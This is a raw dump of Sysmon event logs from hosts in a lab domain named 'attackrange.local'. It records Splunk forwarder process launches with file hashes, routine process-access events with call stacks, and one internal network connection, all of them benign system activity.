08:11:52.336{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055876Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:52.336{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F948-60EB-1C7E-00000000CF01}7116C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055875Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:52.321{466BC892-F948-60EB-1C7E-00000000CF01}7116C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001055894Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:53.020{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F949-60EB-1D7E-00000000CF01}6064C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055893Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:53.020{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055892Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:53.020{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055891Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:53.020{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055890Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:53.020{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055889Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:53.020{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F949-60EB-1D7E-00000000CF01}6064C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055888Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:53.020{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F949-60EB-1D7E-00000000CF01}6064C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055887Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:53.005{466BC892-F949-60EB-1D7E-00000000CF01}6064C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000811180Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:51.212{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57522-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000-